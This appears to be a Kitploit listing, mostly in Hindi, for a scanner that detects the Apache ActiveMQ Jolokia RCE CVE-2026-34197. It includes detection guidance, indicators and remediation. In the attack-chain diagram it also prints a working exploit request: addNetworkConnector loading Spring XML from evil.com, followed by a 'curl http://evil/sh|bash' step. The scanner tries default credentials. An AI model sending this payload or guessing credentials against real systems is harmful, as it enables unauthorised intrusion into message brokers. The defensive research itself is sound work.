Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34197 — Apache ActiveMQ Classic RCE (CVE-2026-34197) का पता Jolokia API के माध्यम से Python और Nmap NSE स्क्रिप्ट्स से लगाता है, जो बिना प्रमाणीकरण के एक्सेस और संस्करण भेद्यता की जाँच करता है। | Kitploit
उपकरण/GitHubGitHub/keraattin/cve-2026-34197
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubkeraattin/cve-2026-34197

CVE-2026-34197

Apache ActiveMQ Classic RCE (CVE-2026-34197) का पता Jolokia API के माध्यम से Python और Nmap NSE स्क्रिप्ट्स से लगाता है, जो बिना प्रमाणीकरण के एक्सेस और संस्करण भेद्यता की जाँच करता है।

रिपॉजिटरी देखें
245 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34197 — Apache ActiveMQ Classic में Jolokia API के माध्यम से RCE

CVE-2026-34197 CVSS 8.8 CWE-94 ActiveMQ Classic

TL;DR

Apache ActiveMQ Classic में एक रिमोट कोड एक्ज़ीक्यूशन कमज़ोरियाँ जो एक हमलावर को Jolokia API (/api/jolokia/) के माध्यम से addNetworkConnector(String) MBean ऑपरेशन को कॉल करके मनमाना कोड निष्पादित करने की अनुमति देती है। हमलावर एक दुर्भावनापूर्ण brokerConfig पैरामीटर एम्बेड करता है जो एक रिमोट Spring XML फ़ाइल की ओर इशारा करता है, जिसे ActiveMQ लाकर पार्स करता है, मनमाने Java ऑब्जेक्ट्स को इंस्टैंशिएट करता है और कोड निष्पादन प्राप्त करता है।

ActiveMQ संस्करण 6.0.0 से 6.1.1 पर, Jolokia एंडपॉइंट पूरी तरह से अनप्रमाणित है, जिससे यह एक ज़ीरो-क्लिक अनप्रमाणित RCE बन जाता है।

यह कमज़ोरी AI सहायता से खोजे जाने से पहले 13 वर्षों तक कोडबेस में छिपी हुई थी।


विषय-सूची

  • त्वरित तथ्य
  • Apache ActiveMQ क्या है?
  • कमज़ोरी का गहन विश्लेषण
    • आर्किटेक्चर: Jolokia और JMX
    • हमले की श्रृंखला
    • प्रमाणीकरण का अंतर
  • प्रभाव विश्लेषण
  • प्रभावित संस्करण
  • पहचान
    • Python स्कैनर
    • Nmap NSE स्क्रिप्ट
    • मैन्युअल सत्यापन
  • समझौते के संकेतक
  • उपचार
  • संदर्भ
  • लेखक

त्वरित तथ्य

फ़ील्डविवरण
CVE IDCVE-2026-34197
विक्रेताApache Software Foundation
उत्पादApache ActiveMQ Classic
प्रभावित संस्करण5.19.4 और 6.2.3 से पहले के सभी संस्करण
अनप्रमाणित RCEसंस्करण 6.0.0 से 6.1.1 (Jolokia में कोई प्रमाणीकरण नहीं)
CVSS v3.18.8 (उच्च)
CWECWE-94 — कोड उत्पादन का अनुचित नियंत्रण
हमला वेक्टरनेटवर्क
प्रमाणीकरण5.x पर आवश्यक; कोई नहीं 6.0.0 से 6.1.1 पर
उपयोगकर्ता सहभागिताकोई नहीं
एक्सप्लॉइट परिपक्वतासार्वजनिक PoC उपलब्ध
पैच किया गयाActiveMQ Classic 5.19.4, 6.2.3 में
बग की आयुकोडबेस में ~13 वर्ष
खोजAI-सहायता प्राप्त कमज़ोरी अनुसंधान

Apache ActiveMQ क्या है?

Apache ActiveMQ Classic Java इकोसिस्टम में सबसे व्यापक रूप से तैनात ओपन-सोर्स मैसेज ब्रोकरों में से एक है। यह Java Message Service (JMS) विनिर्देशन को लागू करता है और दुनिया भर के हजारों एंटरप्राइज़ वातावरणों में अतुल्यकालिक संचार की रीढ़ के रूप में कार्य करता है।

ActiveMQ ऑर्डर प्रोसेसिंग कतारों और वित्तीय लेनदेन पाइपलाइनों से लेकर IoT टेलीमेट्री स्ट्रीम और माइक्रोसर्विस इवेंट बसों तक सब कुछ संभालता है। यदि आपका संगठन Java-आधारित माइक्रोसर्विस, इवेंट-संचालित आर्किटेक्चर, या किसी भी प्रकार के अतुल्यकालिक मैसेजिंग का उपयोग करता है, तो इस बात की अच्छी संभावना है कि ActiveMQ स्टैक में कहीं न कहीं मौजूद है।``` ActiveMQ Broker ┌───────────────────────┐ │ │ ┌──────────┐ │ ┌───────────────┐ │ ┌──────────┐ │ Producer │───────▶│ │ Message │ │───────▶│ Consumer │ │ (App A) │ send │ │ Queue / │ │ recv │ (App B) │ └──────────┘ │ │ Topic │ │ └──────────┘ │ └───────────────┘ │ ┌──────────┐ │ │ ┌──────────┐ │ Producer │───────▶│ ┌───────────────┐ │───────▶│ Consumer │ │ (App C) │ │ │ Jolokia │ │ │ (App D) │ └──────────┘ │ │ API (:8161) │ │ └──────────┘ │ └───────┬───────┘ │ └───────────┼───────────┘ │ ⚠️ CVE-2026-34197 Attack surface here

root@kitploit:~
जब कोई हमलावर ActiveMQ से समझौता करता है, तो उन्हें सिर्फ एक सर्वर पर शेल नहीं मिलता। वे संगठन में **हर संदेश प्रवाह के केंद्र** में बैठते हैं, और महत्वपूर्ण प्रणालियों के बीच संदेशों को पढ़ने, संशोधित करने, पुनर्निर्देशित करने या इंजेक्ट करने में सक्षम होते हैं।

---

## भेद्यता का गहन विश्लेषण

### आर्किटेक्चर: Jolokia और JMX

**JMX** (Java Management Extensions) Java अनुप्रयोगों के लिए मानक प्रबंधन इंटरफ़ेस है। यह "MBeans" (Managed Beans) को उजागर करता है जो अनुप्रयोग के आंतरिक भागों की निगरानी और नियंत्रण की अनुमति देते हैं। ActiveMQ ब्रोकर, कतारों, विषयों, कनेक्शनों और अधिक के प्रबंधन के लिए MBeans को उजागर करता है।

**Jolokia** एक JMX-ओवर-HTTP ब्रिज है। यह JMX संचालन को एक RESTful JSON API में अनुवादित करता है, जिससे समर्पित JMX क्लाइंट की आवश्यकता के बिना HTTP अनुरोधों के माध्यम से Java अनुप्रयोगों को प्रबंधित करना संभव हो जाता है।

ActiveMQ Classic में Jolokia अंतर्निहित रूप से शामिल है, जो वेब कंसोल पोर्ट (डिफ़ॉल्ट: 8161) पर `/api/jolokia/` पर उपलब्ध है।```
  Traditional JMX Access:
  ┌──────────┐                                 ┌──────────────┐
  │ JConsole │ ────── JMX Protocol ─────────>  │  ActiveMQ    │
  │          │    (requires JMX client)        │  MBeans      │
  └──────────┘                                 └──────────────┘

  Jolokia HTTP Access:
  ┌──────────┐                                ┌──────────────┐
  │  curl /  │ ── POST /api/jolokia/ ───────> │  ActiveMQ    │
  │ browser  │    (just needs HTTP)           │  MBeans      │
  └──────────┘                                └──────────────┘
                       ⬆️
           Anyone with HTTP access can
           invoke MBean operations

यहीं से परेशानी शुरू होती है। Jolokia एक साधारण HTTP API के माध्यम से JMX प्रबंधन की पूरी शक्ति को उजागर करता है। और ब्रोकर पर उपलब्ध MBean ऑपरेशनों में से एक है addNetworkConnector(String)।

हमले की श्रृंखला

addNetworkConnector(String) ऑपरेशन ActiveMQ ब्रोकर इंस्टेंस के बीच नेटवर्क ब्रिज बनाने के लिए डिज़ाइन किया गया है। यह एक URI स्ट्रिंग स्वीकार करता है जो बताता है कि दूसरे ब्रोकर से कैसे कनेक्ट किया जाए।

ActiveMQ इन-प्रोसेस ब्रोकर कनेक्शन के लिए vm:// URI स्कीम का समर्थन करता है। ये URI एक brokerConfig पैरामीटर का समर्थन करते हैं जो एक Spring XML कॉन्फ़िगरेशन फ़ाइल की ओर इशारा करता है। और Spring XML मनमाने Java ऑब्जेक्ट्स को इंस्टैंशिएट कर सकता है।

यहाँ पूरी श्रृंखला है:``` Step 1: Attacker sends POST to /api/jolokia/ ┌────────────────────────────────────────────────────────────┐ │ POST /api/jolokia/ │ │ { │ │ "type": "exec", │ │ "mbean": "org.apache.activemq:type=Broker,brokerName= │ │ localhost", │ │ "operation": "addNetworkConnector", │ │ "arguments": [ │ │ "vm://b?brokerConfig=xbean:http://evil.com/pwn.xml" │ │ ] │ │ } │ └────────────────────────────────────────────────────────────┘ │ ▼ Step 2: ActiveMQ parses the vm:// URI Sees brokerConfig=xbean:http://evil.com/pwn.xml │ ▼ Step 3: ActiveMQ fetches http://evil.com/pwn.xml (outbound HTTP request from the broker) │ ▼ Step 4: The XML is parsed as Spring configuration Spring instantiates beans defined in the XML │ ▼ Step 5: Malicious bean executes arbitrary Java code ┌──────────────────────────────────────────┐ │ │ │ │ │ │ │ /bin/bash │ │ -c │ │ curl http://evil/sh|bash │ │ │ │ │ │ │ │ │ └──────────────────────────────────────────┘

root@kitploit:~
ActiveMQ बिल्कुल वही कर रहा है जो इसे करने के लिए डिज़ाइन किया गया था: एक ब्रोकर कॉन्फ़िगरेशन लोड करना। समस्या यह है कि कॉन्फ़िगरेशन स्रोत हमलावर के नियंत्रण में है, और Spring XML प्रभावी रूप से एक कोड निष्पादन प्रारूप है।

### प्रमाणीकरण अंतराल

यही वह चीज़ है जो इस भेद्यता को गंभीर से क्रिटिकल स्तर तक ले जाती है:

| ActiveMQ संस्करण | Jolokia प्रमाणीकरण स्थिति | प्रभाव |
|:---:|:---:|:---:|
| 5.x (< 5.19.4) | प्रमाणित (डिफ़ॉल्ट: admin:admin) | प्रमाणित RCE, अक्सर आसानी से बायपास हो जाता है |
| 6.0.0 से 6.1.1 | **पूरी तरह से अप्रमाणित** | **अप्रमाणित RCE** |
| 6.1.2 से 6.2.2 | प्रमाणित | प्रमाणित RCE |
| 5.19.4+ / 6.2.3+ | पैच किया गया | भेद्य नहीं |

ActiveMQ 6.0.0 से 6.1.1 पर, Jolokia एंडपॉइंट को **शून्य प्रमाणीकरण** की आवश्यकता होती है। कोई भी व्यक्ति जो पोर्ट 8161 तक पहुँच सकता है, उसे अप्रमाणित रिमोट कोड निष्पादन मिल जाता है।

यहां तक कि उन संस्करणों पर जहां Jolokia को प्रमाणीकरण की आवश्यकता होती है, डिफ़ॉल्ट क्रेडेंशियल `admin:admin` व्यापक रूप से ज्ञात हैं और अक्सर विकास, स्टेजिंग और उत्पादन वातावरण में अपरिवर्तित छोड़ दिए जाते हैं।

---

## प्रभाव विश्लेषण

**ब्रोकर होस्ट पर तत्काल प्रभाव:**
- ActiveMQ प्रक्रिया के विशेषाधिकारों के साथ पूर्ण रिमोट कोड निष्पादन
- सभी संदेश कतारों, विषयों और संग्रहीत संदेशों तक पहुँच
- ट्रांज़िट में संदेशों को पढ़ने/संशोधित करने/इंजेक्ट करने की क्षमता
- कॉन्फ़िगरेशन फ़ाइलों, कीस्टोर और संग्रहीत क्रेडेंशियल तक पहुँच

**डाउनस्ट्रीम प्रभाव (संदेश हेरफेर के माध्यम से):**
- प्रोसेसिंग कतारों में दुर्भावनापूर्ण संदेशों का इंजेक्शन
- फ्लाइट में वित्तीय लेनदेन, ऑर्डर या कमांड का संशोधन
- ब्रोकर के माध्यम से बहने वाले संवेदनशील डेटा का अवरोधन
- सभी संदेश-निर्भर सेवाओं का विघटन

**एंटरप्राइज़ जोखिम प्रवर्धन:**
- ActiveMQ हर उस एप्लिकेशन के चौराहे पर बैठा है जो इसका उपयोग करता है
- एक समझौता किया गया ब्रोकर दर्जनों कनेक्टेड सेवाओं को प्रभावित कर सकता है
- संदेश ब्रोकर आमतौर पर व्यापक पहुँच वाले विश्वसनीय नेटवर्क ज़ोन में स्थित होते हैं
- ब्रोकर की नेटवर्क स्थिति से पार्श्व गति सीधी है```
  What an attacker can do after exploitation:

  ┌─────────────────────────────────────────────────────────┐
  │               Compromised ActiveMQ Broker               │
  └────┬───────────┬───────────┬───────────┬──────────┬─────┘
       │           │           │           │          │
       ▼           ▼           ▼           ▼          ▼
  Read/modify   Inject       Pivot to     Intercept    Deploy
  messages      malicious    connected    creds in     persistent
  in transit    messages     systems      messages     backdoor

प्रभावित संस्करण

संस्करणस्थिति
ActiveMQ Classic 6.2.3+पैच किया गया
ActiveMQ Classic 5.19.4+पैच किया गया
ActiveMQ Classic 6.0.0 से 6.2.2असुरक्षित (6.0.0 से 6.1.1 = बिना प्रमाणीकरण के)
ActiveMQ Classic < 5.19.4असुरक्षित (प्रमाणीकृत)
ActiveMQ Artemisप्रभावित नहीं (अलग कोडबेस)

पहचान

Python स्कैनर

Python स्क्रिप्ट बहु-चरणीय विश्लेषण के माध्यम से असुरक्षित ActiveMQ इंस्टेंस का पता लगाती है।

यह कैसे काम करता है:

  1. Jolokia एंडपॉइंट जाँच — जाँचता है कि क्या /api/jolokia/ बिना प्रमाणीकरण के सुलभ है (HTTP 200 = खुला, 401 = प्रमाणीकरण आवश्यक)
  2. डिफ़ॉल्ट क्रेडेंशियल परीक्षण — यदि Jolokia को प्रमाणीकरण की आवश्यकता है, तो admin:admin, user:user, admin:activemq आज़माता है
  3. संस्करण पहचान — रेगेक्स पैटर्न मिलान का उपयोग करके /admin/ और / पृष्ठों से ActiveMQ संस्करण स्ट्रिंग्स निकालता है
  4. MBean पहुँच — एक्सप्लॉइट पथ की पुष्टि करने के लिए org.apache.activemq:type=Broker के लिए एक सुरक्षित Jolokia खोज क्वेरी करता है

कोई एक्सप्लॉइट पेलोड नहीं भेजा जाता। कोई कमांड निष्पादित नहीं की जाती। स्कैनर केवल एंडपॉइंट पहुँच और संस्करण जानकारी का अवलोकन करता है।

उपयोग:```bash

Install dependencies

pip install -r requirements.txt

Single target

python CVE-2026-34197_ActiveMQ_Jolokia_detector.py -t http://activemq-host:8161

With custom credentials

python CVE-2026-34197_ActiveMQ_Jolokia_detector.py -t http://10.0.0.1:8161 -u admin -p secret

Bulk scan from file with verbose output

python CVE-2026-34197_ActiveMQ_Jolokia_detector.py -f targets.txt -o results.json -v

HTTPS with SSL verification disabled (default)

python CVE-2026-34197_ActiveMQ_Jolokia_detector.py -t https://activemq-host:8161

Increased timeout for slow networks

python CVE-2026-34197_ActiveMQ_Jolokia_detector.py -t http://10.0.0.1:8161 --timeout 20

root@kitploit:~
**विकल्प:**

| फ़्लैग | विवरण | डिफ़ॉल्ट |
|------|-------------|---------|
| `-t`, `--target` | एकल लक्ष्य URL (जैसे, `http://host:8161`) | — |
| `-f`, `--file` | लक्ष्य URL वाली फ़ाइल, प्रति पंक्ति एक (`#` टिप्पणियाँ समर्थित) | — |
| `-u`, `--username` | Jolokia प्रमाणीकरण के लिए उपयोगकर्ता नाम | — |
| `-p`, `--password` | Jolokia प्रमाणीकरण के लिए पासवर्ड | — |
| `-o`, `--output` | परिणाम JSON फ़ाइल में सहेजें | — |
| `--timeout` | कनेक्शन टाइमआउट सेकंड में | `10` |
| `--verify-ssl` | SSL प्रमाणपत्र सत्यापन सक्षम करें | अक्षम |
| `-v`, `--verbose` | पूर्ण विवरण के साथ विस्तृत आउटपुट | बंद |

**उदाहरण आउटपुट:**```
[*] CVE-2026-34197 Apache ActiveMQ Jolokia RCE Scanner
[*] Scanning 1 target(s)...

======================================================================
Target: http://10.0.0.1:8161
Scan Time: 2026-04-14T15:30:00Z
Risk Level: CRITICAL
======================================================================
  Jolokia Accessible:    YES
  Requires Auth:         NO (unauthenticated)
  ActiveMQ Version:      6.1.0
  Vulnerable:            YES
  Unauth RCE (6.0-6.1): YES — CRITICAL
  Broker MBean Access:   YES

  Details:
    - Jolokia API accessible WITHOUT authentication
    - Detected ActiveMQ version: 6.1.0
    - Version 6.1.0 is in unauthenticated range (6.0.0 - 6.1.1)
      CRITICAL: No auth required!
    - Broker MBean accessible: [org.apache.activemq:type=Broker,...]

======================================================================
[*] Scan Complete: 1 targets scanned
[*] Vulnerable: 1 | Critical: 1
======================================================================

Nmap NSE स्क्रिप्ट```bash

Install the NSE script

sudo cp CVE-2026-34197_ActiveMQ_Jolokia.nse /usr/share/nmap/scripts/ sudo nmap --script-updatedb

Basic scan

nmap -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia

Scan a subnet

nmap -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia 10.0.0.0/24

Multiple common ports

nmap -p 8161,61616,443,8080 --script CVE-2026-34197_ActiveMQ_Jolokia

Scan targets from a file

nmap -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia -iL targets.txt

With service version detection

nmap -sV -p 8161 --script CVE-2026-34197_ActiveMQ_Jolokia

root@kitploit:~
**उदाहरण Nmap आउटपुट:**```
PORT     STATE SERVICE
8161/tcp open  http
| CVE-2026-34197_ActiveMQ_Jolokia:
|   VULNERABLE:
|   Apache ActiveMQ Jolokia RCE (CVE-2026-34197)
|     State: VULNERABLE
|     Risk level: CRITICAL
|     ActiveMQ Version: 6.1.0
|     Jolokia Accessible: true (unauthenticated)
|     Description:
|       CRITICAL: Jolokia API is accessible without authentication on
|       ActiveMQ 6.1.0, enabling unauthenticated remote code execution
|       via addNetworkConnector MBean.
|     References:
|_      https://nvd.nist.gov/vuln/detail/CVE-2026-34197

मैन्युअल सत्यापन

यदि आप curl के साथ मैन्युअल रूप से जांचना चाहते हैं:```bash

Step 1: Check if Jolokia is accessible (should return JSON if open)

curl -sk http://:8161/api/jolokia/ | python3 -m json.tool

Step 2: Check with default credentials (if Step 1 returns 401)

curl -sk -u admin:admin http://:8161/api/jolokia/ | python3 -m json.tool

Step 3: Check MBean accessibility (safe read-only query)

curl -sk http://:8161/api/jolokia/search/org.apache.activemq:type=Broker,brokerName=*
| python3 -m json.tool

root@kitploit:~
यदि चरण 1 Jolokia एजेंट जानकारी के साथ JSON प्रतिक्रिया लौटाता है, तो एंडपॉइंट प्रमाणीकरण रहित है। यदि चरण 2 डिफ़ॉल्ट क्रेडेंशियल्स के साथ काम करता है, तो आपके पास प्रमाणित पहुंच है। किसी भी तरह से, यदि ब्रोकर MBean सुलभ है, तो शोषण पथ मौजूद है।

---

## समझौते के संकेतक

अपने वातावरण में इन संकेतों पर नज़र रखें:

| संकेतक | कहाँ जाँचें | क्या देखें |
|:---|:---|:---|
| Jolokia पहुंच | वेब कंसोल एक्सेस लॉग | `/api/jolokia/` पर POST जिसमें `addNetworkConnector` शामिल हो |
| आउटबाउंड फ़ेच | नेटवर्क लॉग / फ़ायरवॉल | ActiveMQ से अप्रत्याशित बाहरी होस्ट्स तक HTTP अनुरोध |
| Spring XML लोडिंग | ActiveMQ लॉग | `xbean:http://` URI के संदर्भ |
| नेटवर्क कनेक्टर | ब्रोकर कॉन्फ़िगरेशन | `brokerConfig` पैरामीटर वाले `vm://` URI जो आपने नहीं बनाए |
| चाइल्ड प्रोसेस | प्रोसेस मॉनिटरिंग | ActiveMQ Java प्रोसेस द्वारा उत्पन्न अप्रत्याशित प्रोसेस |

**जांच कमांड:**```bash
# Check ActiveMQ logs for suspicious Jolokia operations
grep -r "addNetworkConnector\|brokerConfig\|xbean:http" /var/log/activemq/

# Check for unexpected network connectors in running broker
curl -sk http://<TARGET>:8161/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/NetworkConnectors

# Monitor for unexpected outbound connections from the ActiveMQ process
ss -tnp | grep java

# Check for unexpected child processes
ps aux --forest | grep -A5 activemq

उपचार (Remediation)

तत्काल कार्रवाई (अभी करें):

  1. ActiveMQ Classic को संस्करण 5.19.4 या 6.2.3 में अपग्रेड करें (आपकी ब्रांच पर निर्भर करता है)
  2. Jolokia एक्सेस प्रतिबंधित करें — /api/jolokia/ तक बाहरी पहुंच को रोकने के लिए फ़ायरवॉल नियम या रिवर्स प्रॉक्सी ACL जोड़ें
  3. डिफ़ॉल्ट क्रेडेंशियल बदलें यदि आप वेब कंसोल पर admin:admin चला रहे हैं

अल्पकालिक (इस सप्ताह):

  1. Jolokia एक्सेस लॉग की ऑडिट करें शोषण के संकेतों के लिए (addNetworkConnector ऑपरेशन देखें)
  2. सभी ActiveMQ इंस्टेंस पर नेटवर्क कनेक्टर की समीक्षा करें अनधिकृत प्रविष्टियों के लिए
  3. ActiveMQ ब्रोकर होस्ट से अप्रत्याशित आउटबाउंड कनेक्शन जांचें
  4. ब्रोकर के माध्यम से जुड़ने वाली किसी भी सेवा के क्रेडेंशियल रोटेट करें

दीर्घकालिक:

  1. मैसेज ब्रोकर इंफ्रास्ट्रक्चर के लिए नेटवर्क सेगमेंटेशन (समर्पित प्रबंधन VLAN)
  2. Jolokia एक्सेस पैटर्न की निगरानी अप्रत्याशित MBean ऑपरेशनों पर अलर्ट के साथ
  3. ActiveMQ को नियमित भेद्यता स्कैनिंग और पैच प्रबंधन चक्रों में शामिल करें
  4. Jolokia को पूरी तरह से अक्षम करें यदि JMX प्रबंधन की आवश्यकता नहीं है, या इसे केवल localhost से बांधें

संदर्भ (References)

  • Horizon3.ai — CVE-2026-34197 ActiveMQ RCE via Jolokia API
  • SecurityWeek — RCE Bug Lurked in Apache ActiveMQ Classic for 13 Years
  • Help Net Security — Apache ActiveMQ RCE Vulnerability CVE-2026-34197
  • CSO Online — Claude Uncovers a 13-year-old ActiveMQ RCE Bug
  • CCB Belgium — Warning: High Severity Vulnerability in Apache ActiveMQ
  • CSA Singapore — Critical Vulnerability in Apache ActiveMQ Classic
  • GBHackers — Claude Identifies Critical 13-Year-Old RCE Vulnerability

लेखक (Author)

केरेम ओरुक (Kerem Oruç) — साइबर सुरक्षा इंजीनियर

  • GitHub: @keraattin
  • Twitter: @keraattin
टूल डाउनलोड करें